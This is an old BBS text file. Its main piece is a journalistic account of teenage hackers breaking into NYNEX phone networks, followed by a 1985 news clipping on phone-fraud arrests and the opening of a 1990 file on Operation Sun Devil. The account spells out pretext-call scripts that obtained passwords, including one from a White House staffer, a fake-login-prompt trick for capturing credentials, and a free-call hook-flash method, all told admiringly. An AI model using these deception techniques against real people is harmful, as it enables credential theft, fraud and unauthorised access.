     For the adventurer, social engineering may seem like cheating.  Getting a
password can be done by purely technical hacking means: programming a computer
to try thousands of passwords.  But to these guys (and even to their
apprentices after a few weeks), this method is as irritating as playing the
first levels of a video game after you've mastered them.  You want to whiz
right past such tedium to the more interesting levels.  Getting a password is
not hacking.  It is a pain in the ass.

     Social-engineering a used-car dealer is easy, even if you don't know what
you're doing (because he doesn't either - although his natural suspicion as a
civilian often means you don't get past the hellos).  Social-engineering a
computer specialist with high-level access is easy only if you do know what
you're doing.  The professional needs to hear a few bits of jargon, just enough
artfully expressed codes to make him feel that he is talking to a member of the
guild.  Both forms are surprisingly successful.

     "Sometimes," says Kool, "it's so simple.  I used to have contests with my
friends to see how few words we could use to get a password.  Once I called up
and said, `Hi, I'm from the social-engineering center and I need your
password,' and they gave it to me!  I swear, sometimes I think I could call up
and say, `Hi, I'm eating a banana split.  Give me your password.'"

Like its mechanical counterpart, social engineering is half business and half
pleasure.  It is a social game that allows the accomplished hacker to show off
his knowledge of systems, his mastery of jargon, and especially his ability to
manipulate people.  It not only allows the hacker to get information; it also 
has the comic attractions of the old-fashioned prank call - fooling an adult,
improvisation, cruelty.

     In the months we spent with the hackers, the best performance in a social-
engineering role was by a hacker named Oddjob.  With him and three other guys
we pulled a hacking all-nighter in the financial district, visiting pay phones
in the hallway of the World Trade Center, outside the bathrooms of the Vista
Hotel, and in the lobby of the international headquarters of American Express.

     Oddjob's magnum opus takes place along the south wall of the phone bank 
leading to the Vista's bathrooms.  We bolshevize six chairs from the women's
powder room and attach our computer to a pay phone.  Throughout the night, the
hackers compliment one another on the sheer genius of the place: chairs, a 
snack bar down the hall, and - on a nasty, humid city night - air conditioning.

     At the rarefied level these four have reached, an evening's work often 
revolves around the links between networks in the NYNEX system.  On this night,
one of our links is down; a password has been changed.  Oddjob begs for a 
chance to social engineer something, anything.  His method, he explains, is to
sound like a regular person, to assume the accents of those who do the day-to-
day keypunching and processing - the heavy lifting of the information age.  He
has a considerable repertoire - Brooklyn guy, polite blue-collar type, southern
redneck.  "You should hear my black woman," he boasts.  Tonight's composition
will be performed in the key of Flatbush.

     Oddjob paces furiously on his lilliputian stage, tethered to the pay phone
by the irritatingly short steel line, firing suggestions to the crowd on whom
to call, taking in ideas.  Part of the thrill of social engineering is clearly 
the improvisation of it all.  But it's improvisation with a competitive edge.
You show your machismo by waiting until the last possible second to prepare 
yourself.  The moment after dialing, before the phone is answered, a true 
hacker will suddenly request vital information.  "Where should I say I'm 
calling from?"  "Who do I ask for?" or even "Where am I calling?"  Oddjob is
feigning such recklessness when the phone is answered.  He opens by 
establishing his credentials in thick Brooklynese:

     "Yeah, hoi deh.  Dis is Tucker calling from Pearl Street operations.  
Yeah, hi.  You guys havin' trouble gettin' into the NPSN deh?  You guys are 
goin' through a packet switch, right?  Yeah, when you go into COSMOS.  Okay,
'cause dat's where the problems are - ya da guy reported it.  Okay, what do you
use for the packet switch when you first connect - do you have your own code?"

     She does have her own code; unfortunately, she is not about to give it to
him.  She tells him to solve his problem by checking the manual.  So Oddjob
loudly flips through the pages of a nearby phone book, pretending to read from
its pages, and finally, frustrated, heaves the phone book toward the wall,
with a crash.  But it's done in a way that says: "Geez, aren't these manuals
frustrating?  We, the folks who do all the work, are supposed to make sense of
these?"  She's beginning to cotton to him and reveals that the first part of
the code is the user's initials.  Oddjob cranks up the charm and moves in for
the kill.

     "Okay, so what do you put in?  GWT?  Are those your initials?  What's your
name?  Gail?  That's a nice name.  Mine?  Tucker.  Yeah, that's my last name.  
I don't like my first name because it sounds really dumb.  No, I'm not telling.
Noooooooo.  I'm not gonna tell you.  Ooooooh.  You really want to know?  Okay,
it's...Edmonton.  Oh, come on, Edmonton is NOT distinguished, it's silly. They
used to kid me in school.  Yeah.  Heh, heh.  Anyway, just so I can get to the
right system, would you walk me through it?"  She does, and he gets most of the
information he wants.


By 4:00 A.M. we had been thrown out of the Vista and were spread out across the
waxy, marble lobby of American Express headquarters, listening to Oddjob con
another sucker on the phone.  Kool was trying a few breakdancing moves.  The
evening had been devoted almost exclusively to social engineering; we hardly
used the laptop at all.

     As the edge of the horizon began to lighten and the two of us had said
goodnight to the hackers and were walking home, we realized that the entire
evening had provoked an eerie dj vu.  As teenagers, we had both survived many
of these Friday nights; trying halfheartedly to get into trouble, sitting
around with the guys, waiting for something to happen.  It's no accident that
there are no hackers older than about twenty-one; serious hacking requires the
kind of tireless devotion that only teenagers possess.

     As with all teenage pursuits, hacking doesn't last forever.  For most 
hackers, manipulating technology in imaginative ways is nothing more than
rebellion.  They learn high-tech pranks, such as changing the outgoing message
on their algebra teacher's home answering machine, or they figure out how to
chat with other hackers around the country for free.  But these amateurs lack
the patience and resolve to ascend to the levels our companions have attained.
They fool around for six months or a year, get bored, and quit.

     Like any group of teenagers with a common pursuit, serious hackers have 
nothing but contempt for amateurs.  And when a fellow pro moves on, they treat
it almost as betrayal, scorning the traitor as having "faded away into 
society."  They can't imagine it happening to them.
     Hackers are a group that has always existed in teenage society.  They are 
not the genius nerds seen on T.V.  Nerds, by definition, are prosaic.  They 
lack the creativity, the badass guts needed to hack.  Nerds, in fact, are the 
ones who grow up and GET hacked.  Real hackers are the rebellious brains: the 
video-game addicts, the crystal-radio connoisseurs, the Dungeons & Dragons 
freaks.  They are the guys who understand, even love, the way systems work: 
They don't just take things apart and put them back together - they make them 
do something else, something BETTER.

     Where we see only a machine's function, they see its potential.  This is,
of course, the noble and essential trait of the inventor.  But hackers warp it 
with teenage anarchic creativity: Edison with attitude.

     Consider the fax machine.  We look at it; we see a document-delivery 
device.  One hacker we met, Kaos, looked at the same machine and immediately 
saw the Black Loop of Death.  Here's how it works: Photocopy your middle finger
displaying the international sign of obscene derision.  Make two more copies.
Tape these three pages together.  Choose a target fax machine.  Wait until 
nighttime, when you know it will be unattended, and dial it up.  Begin to feed 
your long document into your fax machine.  When the first page begins to emerge
below, tape it to the end of the last page.  Ecce.  This three-page loop will
continuously feed your image all night long.  In the morning, your victim will
find an empty fax machine, surrounded by two thousand copies of your finger,
flipping the bird.

     Ikon and Kool have been hacking the NYNEX phone system for about six 
years.  Although much of their work has been done alone, they have each been in
dozens of informal partnerships and groups, which tend to form quickly and 
dissolve just as fast.  In the early Eighties, some of the best hackers in the
country formed the Legion of Doom, which, despite its wicked name, basically
served as a conduit for information.  The quest to understand NYNEX is a far-
flung, collective enterprise, like the space program, only run by teenagers -
experiments aren't done in scrubbed laboratories but in hotel lobbies; 
information isn't exchanged at symposia in Geneva but at hastily called 
meetings in peculiar locations.  One such meeting has been institutionalized: 
first Friday of every month, Manhattan Citicorp building at Fifty-third and 
Lexington at - where else? - the pay phones.

     Although the channels hackers use to communicate are highly sophisticated,
the way information travels is similar to the way knowledge is passed on in an
oral tradition.  Teleconferences are held on "bridges" - illicit phone links;
technical information is exchanged on private computer bulletin-board systems
run out of hackers' bedrooms; samizdat magazines are distributed with names 
like "Phrack" and "2600."  The latter name is an homage to Captain Crunch's 
2,600-hertz tone, a tacit recognition that this oral tradition stretches back 
decades.

     "Even though hippies were blue-boxing for all it was worth in the
Sixties," explains Ikon, born the year Captain Crunch went to jail, "they
didn't really understand what they were doing.  In the Nineties, we're on a
search for technical knowledge; what WE'RE doing is figuring out how the phone
system really WORKS."

     Once you understand the architecture of the system, all sorts of 
opportunities present themselves.  Consider those telephone hybrids found 
beside most automatic-teller machines - the ones that connect you immediately
with a bank employee.  We see a way of getting help; a hacker sees unlimited 
free long-distance phone calls.  Here's how:

     When you pick up that phone, you hear a moment of silence before the 
automatic dialer beeps out the seven tones that call the bank's service center.
That silence represents an open phone line, waiting to be told what to do.
So instead of waiting for the automatic dialer, click the phone's hook ten
times in rapid succession.  This action perfectly imitates the ten spluttering
pulses of the last hole on the rotary dial - the operator.  When the seven
tones sound, they are ignored; you've already seized control of the phone line.
Wait a moment and the operator will answer.  Explain that you're having trouble
reaching a certain number in the Gobi Desert; could she dial it for you?  Piece
of cake.


Yet if technology giveth, it also taketh away.  One hot Friday night in July,
we get the call to pick up the boys at Penn Station.  They are bringing along 
some friends and a full agenda.  Tonight, we're informed, will hold many 
lessons for us.  When we meet, Ikon gravely explains the situation: "We seem to
have lost our resources."  It appears that NYNEX is starting to change 
passwords on them, and the one dialup into NPSN that was still working is now
disabled.  It just rings and rings.  We will now be starting practically from
scratch.

     We walk east on Thirty-fourth Street toward the Empire State Building.  
We've already hacked from two New York landmarks; why not a third?  At 7:00, 
the building is pretty empty.  Tourists are either taking the escalator down to
to Guinness World of Records Exhibition or the elevator up to the Observation 
Deck.  We're roaming the halls, scoping out pay-phone banks, and feeling rather
conspicuous - six young men with a big black suitcase.  A security guard, 
trying to be helpful, spooks us, and all six of us bolt simultaneously for six
pay phones, pretending to be in midconversation.  A ludicrous paranoia is 
setting in.

     Eventually we find a velvet rope draped across a corridor, guarded only by
a man polishing the floor.  A few furtive glances down the hall, and we're over
and in, ensconced in a secluded phone bank.  We unpack our laptop, our modem,
and our acoustic coupler; happily, the entire contraption fits on the phone's
shelf.

     Ikon starts pounding digits on the pay phone, trying to get that one 
dialup to work.  But there is only continuous ringing.  Suddenly he gets an
idea.  It's a long shot - a solution hopelessly simple.  He calls the actual
office whose computer he's trying to break into and politely asks the woman to
(please) turn on the computer's modem.

     Ecstasy.

     "We're back on!"

     "Yo!  We're worth something!"

     "It's MIZAR!  It's everything!"

     "We have a reason to live!"

     With access to NPSN, we now set out to "liberate" one of these pay phones,
that is, to free it from its addiction to quarters.  We get into the switching
computer for this neighborhood and disconnect the pay phone.  "The beast," Ikon
declares, "is dead.  We have killed it."  Picking up the beast's receiver 
proves that he's right; no dial tone.  "Now we bring the beast back to life,"
Ikon announces, and resurrects it as a regular phone, able to make local and
long-distance calls for free.

     Kool takes out his black marker and writes on the pay phone in the wild 
style of graffiti artists: "The PLO Lives," and then adds, "Payphone Liberation
Organization."  We reconnect the computer to the liberated phone.

     A second security guard happens along.  He has a distinct interest in 
being told just what the - just what in HELL is going on around here, anyway?
Kool takes him aside for a bit of impromptu social engineering.  "We're, uh,
sending a story over the phones.  We're with NBC."  The guard notices the 
peacock logo on Ikon's white NBC baseball cap (NBC Studios gift shop, $10) and
somehow makes sense of this - a bunch of teenagers, the middle of the night,
Cheez Doodles, Jolt Cola; of COURSE they're TV reporters.  Now he wants to chat
US up.

     "What's the story on?" he asks eagerly.

     "It's on the pay phones at the Empire State Building," replies Kool.  "You
know, uh, what kind of problems they have..."  Kools improvisation is getting
almost comically desperate, but the guard still buys it.  After a moment, he
moves on to complete his rounds.

     From our current perch in NPSN, we want to hop onto the Brooklyn COSMOS
maintenance system.  The password we've using no longer works; they've changed
the locks.  This is a serious problem.  Social engineering at this level is 
extremely difficult, because the operators have been burned too many times to
just hand over a password.  What's more, there is no direct phone number to 
COSMOS, dialup; COSMOS can only be reached from NPSN.  But there is, as always,
another way.  This time it's called "pad-to-pad," probably the most advanced
hacking procedure, because it calls for an artful use of both mechanical and
social-engineering talents.  Here's how it works:

     Call an office in Brooklyn where you know they use COSMOS.  Tell the 
person who answers that you're troubleshooting her COSMOS account, and you need
her help.  Ask her to type STAT on her keyboard and read off the number that
appears.  With it, you can connect directly to her computer terminal; now YOUR
screen is HER screen.  Everything she types you can read, and vice versa.  
Begin the social engineering: Ask her to sign on to COSMOS and enter her 
password.  She thinks everything is fine because she isn't telling you anything
over the telephone, and she isn't, exactly; she's just typing on her terminal.
And you type on yours, faking the computer's commands.  When she types in her
account number, you respond - as the computer would - by typing "Password?"  Of
course, her password won't get her onto COSMOS, since she's connected only to 
your computer; instead, it appears in glowing letters on your screen.  You type
"login incorrect."  Before she tries again, detach your terminal from hers and
keep talking, offering friendly advice.

     At the Empire State Building, standing at a pay phone, our first shot at 
pad-to-pad works perfectly.  Our victim puzzles over why the system won't grant
her access and tries again.  In a flash she hears the familiar clicks and 
squeaks that assure her she is safely on, and she and Ikon exchange cheerful
banter as the COSMOS warning flashes on her screen:


                             ATTENTION ALL USERS
     Under no circumstances should you disclose your logon password to anyone
on the phone or in person.


Ikon strings her along for another few minutes, listening to her complaints, 
completing the lie: "Well, it seemed to be okay from this end.  The first time
it said `login incorrect,' huh?  You think you might have typed it in wrong?

     But he's barely listening now, performing the coda by rote, because he's
already connected to the Brooklyn COSMOS with her account, and he's exploring,
looking for a backdoor program he installed here the last time he was on, 
before they moved the mainframe from Brooklyn to Massachusetts.

     "It's here!" Ikon shouts.

     "They're so stupid, man," says Kool.

     "When they copied all the commands they copied our backdoor command over
too," Ikon explains.

     We execute this old command, disappear through the "back door," and 
surface on a higher, more powerful level of the machine.  For the next few 
hours, we explore this strange new land, trying to figure out the look of the
place.  We are a dozen hands groping in the darkness, feeling our way along the
wall of a system somewhere in Massachusetts.  While one hacker works the 
keyboard, the others throw out suggestions.  Over time, ideas are winnowed, 
attempts are assayed.  Failures are common, but they are relieved by moments of
hope.  A small obstacle is surmounted or a new passageway is discovered.  The 
fun of gaining entry is over; now most of the hacking is trial and error, 
banging away at an obstacle until a path over, around, or through is revealed.
At this remove - we are relayed off three computers and extended across four
states - even the easiest of hacking problems can suddenly become complex 
again.

     We, the reporters, try to buoy our own interest by peppering the hackers
with questions.  But after a while, the answers are numbingly similar: "We're
trying to get in."  "We're just looking around."  "We're trying to figure out
what this does."  After three hours, we are slumped against a wall,
contemplating the significance of our boredom.  At times, accompanying hackers
is about as exciting as watching a graduate student flip through a card
catalogue.  During the fourth hour, several of the hackers grow restless.  One
leaves, another calls some friends.  Kool slides down the wall to join us, and
wistfully recalls the old days, when he could hack for twelve hours without a
break.

     Ikon outlasts everyone, which is not unusual.  He's deep within the 
machine now, wired, intense, alert.  He waves off the occasional call for food,
ignoring his own hunger and fatigue.  He's been standing before this unit for
five hours without rest; he barely bothers to shift his weight from one leg to
another.  All we hear are the occasional staccato clicks as he attempts yet
another entry.  From time to time a security guard approaches and peers in.  
Our paranoia has yielded to exhaustion.  We wave.


Ikon's reverie doesn't end until the battery pack on the laptop dies.  Everyone
else is relieved; we've been ready to go for hours.

     As we pack up our equipment and head out into the night, Kool's attention
is suddenly distracted by a low-slung, high-tech car.  "Yo, check out that 
Porsche with the cellular phone.  I'd give up hacking for that car."

     "Who needs a Porsche?" asks Ikon.  "We have MIZAR."

     Kool looks at him with amazement, but Ikon goes on.  "I'd rather have all
of NYNEX than a Porsche.  I mean, can you get passwords with a Porsche?"

     Kool, still dumbfounded, states the obvious: "You can get GIRLS with a 
Porsche!  Can you get girls with a password?"

     They're laughing, but we all know it's true: For Ikon, there is no higher
purpose than hacking NYNEX.  Kool, on the other hand, is willing to make a few
exceptions.

     As they discuss the next day's hacking agenda, Kool admits that he's 
getting a little bored with the endless exploration, and suggests that they try
some COOL stuff.  "Maybe we could forward calls to a radio station and be the
only ones who can get through," he suggests.  "We could win tickets to, like, a
Depeche Mode concert."

     Ikon is dismissive.  "No.  The Project."

     "C'mon, let's think of something to DO."

     "No, wait.  The Project, the Project."  He is insistent: We will continue
to chart the landscape of the telephone company.  Nothing else matters.

     We're with Kool, frankly: When do we get to start changing the orbit of 
satellites and listening in on Madonna's phone calls?  For that matter, when do
we conquer the entire NYNEX system?  When does it end?

     "The thing that keeps us so interested," Ikon tells us later, "is that 
with NYNEX, or any other system with good security, we'll NEVER have permanent
access.  We'll always lose what we need, and we'll be forced to find another 
way to get back into it.  It's almost like a game.  It's like a never-ending
role-playing adventure game, but it's real.  The thing that makes it interesting
is that you can never win."

     "So why play?" we ask.  "Why spend years at a keyboard, risking jail, to
play a game you'll never win?"

     "It's like having the edge.  That's the whole thing," says Ikon.  "The 
name of the game is having the edge."

     "Over whom?" we ask.

     "Over anyone else," he replies.  "Some people spend their whole lifetime 
trying to find the one thing that they're really good at.  We've found it 
already.  We're hackers.  You know, there are always these computer 
know-it-alls who say, `Oh yeah, I used to be a hacker.'  That's crap.  If 
you're an ex-hacker, you were never a hacker to begin with.  It's not something
that dies.  It's a way of life.  It's a way of thinking."

     What's the purpose of all this exploration?  After a dozen nights, it hits
us: Hacking HAS no practical purpose.  Every hacker starts as a utilitarian,
viewing the phone systems as a means to an end, such as free calls or high-tech
pranking.  But over time the means BECOME the end.  Advanced hackers are 
nothing more than aestheticians; they marvel not at the system's use but at the
system itself.  Suddenly a nagging contradiction makes sense.  Throughout our
apprenticeship, the hackers consistently scorned our "juvenile" requests to 
hack into TRW.  Now we understand why.  The best hackers are BORED by TRW (and
other record-keeping systems, like those at hospitals and schools) despite the
juicy information they contain.  These computers are simple data-retrieval 
units, not much more complicated than the word processor used to write this
article.  The TRW computer isn't worth hacking, because, as Kool so sweetly 
puts it, "it's a piece of shit."  The phone networks ARE worth hacking, not 
because of what a hacker can use them for, but because of their vast size.  "It
goes back to what Crunch said," Ikon explains.  "The phone system is the 
largest network in the entire world."  It's the hardest thing to hack, and 
therefore, it's the only thing WORTH hacking.  It is from these hackers that 
the law and the corporations have the least to fear.  Ironically, these are the
ones getting busted.

     It is true that everything Kool and Ikon do when hacking is illegal.  All 
their calls are paid for fraudulently; all the systems they enter are 
proprietary.  This fact occasionally provides a frisson of excitement (probably
more so for us, the amateurs, than for serious hackers); more frequently, it is
just ignored.  What these hackers are doing makes absolute sense to them: They
are gaining knowledge.  If there are laws against that, they reason, they're 
not worth taking seriously.  They've probably never heard Bob Dylan's code for
the outlaw - "to live outside the law, you must be honest" - but they 
instinctively follow it.

     If pressed, they will describe the havoc they could unleash on the phone 
system; they could easily write a simple virus that would disable switch after 
switch, shutting down phone service for all of New York and New England in a 
few hours.  The damage, they estimate, could take NYNEX engineers months to 
repair.  "We could handle it," says Ikon flatly.  But asking them what sort of
harm they could do to the phone system is like asking a surgeon what sort of 
harm he could do to a patient he's operating on.  They could destroy it...but
what kind of question is that?

A couple of weeks after the night at the Empire State Building, we're sitting 
with four hackers in the appropriately named Cosmos Diner, watching four rail-
thin adolescents attack four huge plates of meat.  We ask them what had become
an obvious question: What if the phone company actually offered them jobs?

     "If NYNEX offered me a good job in an intelligent position, I'd take it in
a second.  I wouldn't even think about it," replies Ikon.

     "I called," Kool says.  "They said all they had was repair, installation,
and outside plant."

     "Doofus stuff," explains Ikon.  "All they have is dickhead jobs."

     We ask how many people in the phone company know as much about the systems
as they do.

     "To tell you the truth," says Ikon, "I don't think there are ANY.  I'll
tell you why.  Each person in NYNEX specializes in a single network, or just
part of a network.  We, on the other hand, could easily assume the position of
any person in any department for any reason."

     "What would happen if they did hire you, and they said, `Okay, you're in
charge of stopping Hackers'?"

     "There's a problem with that," Ikon explains.  "There was this Legion of
Doom member from Michigan who was busted last year for something minor.  They
gave him a job in some bogus department within Michigan Bell security.  They'd
get him to try to engineer departments, or try to guess passwords and get into
systems.  And then they canceled the project."

     "Would you do a project like that if they asked you?"

     "Yeah!" replies Kool.  "That would be my perfect position."

     "And you could make NYNEX secure?"

     "Sure," says Ikon.  "I could do it in a minute.  We know every single 
aspect of how to get into these systems.  I could tell them in a minute how
to -" He stops himself.  "But the thing is, it wouldn't be worth it.  They
would hire us, they'd get a few secrets and tips from us, and then they'd fire
us.  That's what they did to the guy in Michigan.  They found out exactly what
he could do, and then they fired him."

     "If we were offered a real opportunity to help," Ikon continues, "then we
would help.  But they'll never do that.  They would never admit that they could
be helped by people half their age.  They just have too much pride."

     "When I called up NYNEX to ask for a job," says Kool, "I talked to this 
guy in Corporate Security.  This guy didn't know shit about his network.  I 
told him all these secrets, ways to break in; all they did was block all those
entry points.  I have yet to hear from anybody offering me a job."

     "And later the same day, at home, we got back into the network through
another entrance," says Ikon.  "There's always another way."
     "So fuck them," concludes Kool.


Over the last ten years, this country's relationship with technology has 
changed profoundly, in ways that we are only beginning to understand.  Ten 
years ago, when we wanted to send a letter across town, we'd need a stamp and 
a few days to spare.  Now we fax it in seconds.  When we wanted money, we'd 
have to go cash a check with a real live bank teller.  Now we don't even know
when our banks are open.  Personal computers, long-distance calling cards - we
who have them can't imagine life without them.

     During the same period, the many systems that we depend on - phone 
networks, banking transfers, even our national-security apparatus - have become
increasingly dependent on computers.  We trust these machines, sometimes 
unwittingly, with enormous amounts of personal information.  This rarely 
concerns us; we have developed an almost religious faith in computers and in 
the people who run them.  When we think of these systems at all, we trust that
they are safe.

     We are wrong.

     Every one of these technological advances has made us less secure.  Now
our phones can be disabled; our credit histories can be changed; our medical
profiles can be stolen; our social security information can be accessed.  And
it can all be done by an untraceable teenager at a pay phone, thousands of 
miles away.

     There are no alarms being sounded by the people who run these systems.
NYNEX, in fact, refused to allow any of its security personnel to be 
interviewed for this article.  If computer-security professionals were to admit
that the systems they manage are vulnerable, they would be asked how they could
be made invulnerable.  And at that point, they would have to admit that the
systems cannot be, can never be.

     Much of the public debate over computer hackers involves a search for the
right metaphor.  Are hackers simple trespassers, gliding through our houses 
without harming the contents?  Are they armed robbers, breaking and entering?
Are our computer systems like our homes, locked and protected?  Or are they 
just a huge open field with a tiny sign saying KEEP OFF THE GRASS?

     From a distance, a computer network looks like a fortress - impregnable,
heavily guarded.  As you get closer, though, the walls of the fortress look a
little flimsy.  You notice that the fortress has a thousand doors; that some 
are unguarded, the rest watched by unwary civilians.

     All the hacker has to do to get in is find an unguarded door, or borrow a
key, or punch a hole in the wall.  The question of whether he's allowed is made
moot by the fact that it's unbelievable simple to enter.

     Breaking into computer systems will always remain easy because the systems
have to accommodate dolts like you and me.  If computers were used only by 
brilliant programmers, no doubt they could maintain a nearly impenetrable 
security system.  But computers aren't built that way; they are "dumbed down" 
to allow those who must use them to do their jobs.  So hackers will always be
able to find a trusting soul to reveal a dialup, an account, and a password.
And they will always get in.

     It is gradually dawning on us, thanks mostly to the exploits of hackers, 
that we have much less control over the computers that run our information 
society than we did over, say, file cabinets.  Our general reaction has been to
blame the messengers.  In fact, to try to imprison them.  Although they have 
never harmed the systems they hack. Kool and Ikon will probably be indicted 
early next year for a variety of acts made illegal by the Computer Fraud and
Abuse Act of 1986; the charges they face carry maximum sentences of many 
decades in prison.  But even if hackers are jailed, hacking won't be 
eliminated; it's just too human an instinct, and just too easy a practice.


Toward the end of the summer, we decide to attempt the kind of hack the 
government says is the main threat: We will try to hack the White House - 
specifically, the PROF system installed in 1982 by Admiral John Poindexter, 
then President Reagan's national security adviser.  Poindexter chose PROF in an
attempt to ELIMINATE security breaches.  If any system is unhackable, we 
reason, this is the one.

     By the time we finally get together, however, a week after we first 
discuss PROF with the hackers, we learn that one of them has already called the
White House computer center.  He laid on the usual line about doing work on the
system, and he got a dialup.  The more difficult task, still ahead, is 
obtaining an account and a password.

     We are sitting, as always, around a phone, safe in what one hacker 
describes as "a covert, undisclosed location somewhere in the tri-state area."
He thumbs through a Federal Yellow Book, the publicly available directory for 
the executive branch of the U.S. government.  "Why don't I call one of these
people?" he suggests, pointing to the page headed, EXECUTIVE OFFICE OF THE
PRESIDENT.  He scans down the page - the staffs of Fitzwater, Sununu, 
Scowcroft - and decides randomly on a target a few doors down from the 
President.

     "I'll just talk to him really basic," he explains, dialing the target's
direct number.  "I need a name to use."  As the phone rings in the White House,
he glances around the room and his eyes settle on a T-shirt, signed just above
the pocket by the French designer Franois Girbaud.

     The White House answers.  The hacker's voice drops an octave.

     Hacker: Yeah, how're you doin'?  This is Franois Girbaud with the 
computer operations division.

     White House: Mmm-hmm.

     H: Yeah, I was just wondering if you had any access to the PROF system.

     WH: Yeah, I do.  I don't use it very often, though.

     H: Yeah, I know.  Cause we're, like, troubleshooting your account.

     WH: Oh.

     H: It seems that something's wrong with it.  And, you know, we're 
     wondering if maybe it's, like, one of the dialups that you're using to get
     in or something.

     WH: Well, let me see.  Hold on, I'm just getting out of what I was doing.

     H: You know, if you're too busy I could call back later.

     WH: No, that's okay, this is fine.  Hold on one minute, I'm just saving 
     what I was working on.  Okay.  [He logs into PROF too fast for the hacker
     to get his account.]

     H: Wait, wait.  Why don't you go back a little?  We have to verify the 
     account as you're typing it in.

     WH: Oh, I'm sorry.

     H: Yeah, we want to make sure that it's your account and not somebody 
     else's.

     WH: How do I get out of this?

     H: Ah, don't worry about it.  Just repeat your account.  Just tell me the
     account you're using currently.

     WH: Oh, I'm sorry.  [And he reads off seven characters.]

     H: [trying to decide his next move]  Umm, okay...[but his next move is 
     made for him]

     WH: And do you need my password too?

     H: Um, yeah, sure.  That would be good.


     With an account and a password secured, the hacker politely concludes the 
conversation, hangs up the telephone, and bursts into laughter: "Yo, man,
FRANCOIS GIRBAUD!  I just read the name off his shirt!  It's like saying 
`Levi's!'  I shoulda said `Calvin Klein.'"  Another hacker joins in: "Or Dick
Hertz!"  And another: "Or Mike Hunt!"  For the rest of the evening, Franois
Girbaud is the punch line to every joke.  No other hack could top this one, so
we head out to McDonald's for burgers and Cokes - just a bunch of teenagers, 
hanging on a Friday night.  Maybe tomorrow we will read George Bush's mail.

                Peninsula Hackers Busted
                Uploaded by Elric of Imrryr
                Lunatic Labs News & Archieve Deptment

 Friday, July 26, 1985
Millbrae police arrest alleged teen 'hackers'
by John Curry - Times Staff Writer
MILLBRAE -- A telephoned bomb threat to the White House early this summer led to
the arrest Wednesday (7224) of two teen-age "computer hackers" in Millbrae, 
police report.
  The youths, 17 and 14, allegedly had hacked into access lines by computer and
made phone calls all over the world. So far, the tab to Pacific Bell and MCI is
over $10,000, police Sgt. Ron Caine said.
  The investigation began with the hacked phone call to the White House, 
leading federal authorities there to ask American Telephone and Telegraph (AT&T)
to back-trace the call. When it was determined where the call came from, the
lines were monitored and evidence of phone fraud came out, Caine said.
  "They apparently have some very sophisticated equipment in Washington 
and they can do things like that," Caine observed.
  The White House call was traced to a teleconference system that included as 
many as 59 illegal users, investigators reported.
  "They were just shocked that we had any knowledge of it," Detective Ray 
Celeste added. "The parents, of course, did not have any idea what their kids 
were doing."
  Police seized the youths' computers, an illegal hacking program and a 
homemade "blue box" that can simulate the tones made by puch-button telephone
users, Celeste said.
  The object was to hack into someone's access code by computer, with the calls
then to be billed to that someone else's number, Caine said. The 1.5 month 
investigation by federal and AT&T officials resulted in a 24-page search 
warrant documenting every call the boys allegedly had made up to that point, he
added. The total could increase because there may have been other calls made 
this week since the search warrant was prepared, Caine went on.
  The hacking program was used to try up to 3,000 phone numbers and access codes
per day to see what numbers could be abused, Celeste said.
  The boys were arrested at their homes and released back to their parents 
pending juvenile court action, Caine said. They could face charges of 
computer crime and telephone fraud, the officers said. Caine noted also that the
parents could be held liable for the costs of the phone calls.
  This was not the Peninsula's first experience with alleged high-school 
hackers. In December 1984, police followed up on a tip that three 
Burlingame youths had invaded the GTE Sprint computer system via a "blue box"
to use it without paying toll charges. The trio's phone lines were monitored 
for two weeks while they ran up over $500 worth of calls to the East Coast.



 
Downloaded from Just Say Yes. 2 lines, More than 500 files online!
         Full access on first call. 415-922-2008 CASFA 

 
 
 
  Another file downloaded from:   
 
         !
        -$-             & the Temple of the Screaming Electron
         !    *                    Walnut Creek, CA
   +    /^   |
   !    | |//^  _^_     2400/1200/300 baud  (415) 935-5845  
  /^  /   @ |  /_-_            Jeff Hunter, Sysop
  |@ _| @     @|- - -|                                     
  |  | |    /^ |  _  |                  - - - - - - - - - * 
  |___/____|_|_|_(_)_|       Aaaaaeeeeeeeeeeeeeeeeee!   /   
 
       Specializing in conversations, E-Mail, obscure information,
   entertainment, the arts, politics, futurism, thoughtful discussion, 
          insane speculation, and wild rumours. An ALL-TEXT BBS.
 
                         "Raw data for raw minds." 
 

{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}
{}                                                                    {}
{}                   ** PUSH BUTTON FELONIES **                       {}
{}                                                                    {}
{}       KPFA-FM RADIO BROADCAST JULY 26, 1990 AT 12:00 NOON          {}
{}                                                                    {}
{}            ELECTRONIC TEXT -- PUBLIC INFORMATION FILE              {}
{}                                                                    {}
{}                      ** SPECIAL EDITION **                         {}
{}                              from                                  {}
{}                        THE EPIC PROJECT                            {}
{}        a nonprofit public electronic publishing corporation        {}
{}                                                                    {}
{}                                                                    {}
{}  P.O. Box 5080-341                  Electronic Netmail Address     {}
{}  Fairfield, Ca. 94533               jefrich@well.sf.ca.us          {}
{}  Jeff Aldrich, Contact:             Voice: (707)425-6813           {}
{}  Data: (707)429-1545                Fax: (707)425-9811             {}
{}                                                                    {}
{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}

                              NOTICE

    This text file contains copies of press releases by government
agencies, citizen action organizations, and transcripts of events received
by The EPIC Project.  They example both the personal information power of
telecommunication technology and the current threat to our basic civil
liberties -- our rights to privacy and to protection against unwarranted
searches and seizures.  Panelists on the KPFA-FM "Push Button Felonies"
broadcast are responsible for some of these documents.  This electronic text
information is provided to KPFA listeners by The EPIC Project to increase
understanding of the issues discussed in this broadcast. The EPIC
Project makes no warranty as to document accuracy, expressed or implied.
==========================================================================

KPFA-FM  Studio Panelists:

Assistant Arizona Attorney General Gail Thackery.
Marc Rotenberg of Computer Professionals for Social Responsibility
A Telecommunication Industry Service Provider Representative

KPFA-FM  Telephone Panelist:

Jeff Aldrich, Founder of The EPIC Project Electronic Publishing Corp.

===========================================================================

                              CONTENTS
       
Line  75:  Operation Sun Devil: Press Release
Line 162:  Operation Sun Devil: Secret Service Statement
Line 230:  News Excerpts about Operation Sun Devil
  Source:  Computer Underground Digest Issue #1.09

Line 393:  Letter from the Director of the Secret Service to Rep. Don Edwards
Line 692:  CPSR FOIA Request to the FBI Regarding BBS Surveillance
Line 804:  CPSR letter to Congressman Don Edwards regarding FOIA request
Line 901:  Chronology of events
  Source:  Computer Professionals for Social Responsibility (CPSR)

Line 1048: Sun Devil gives birth to the Electronic Frontier Foundation
Line 1141: Electronic Frontier Foundation: Mission Statement
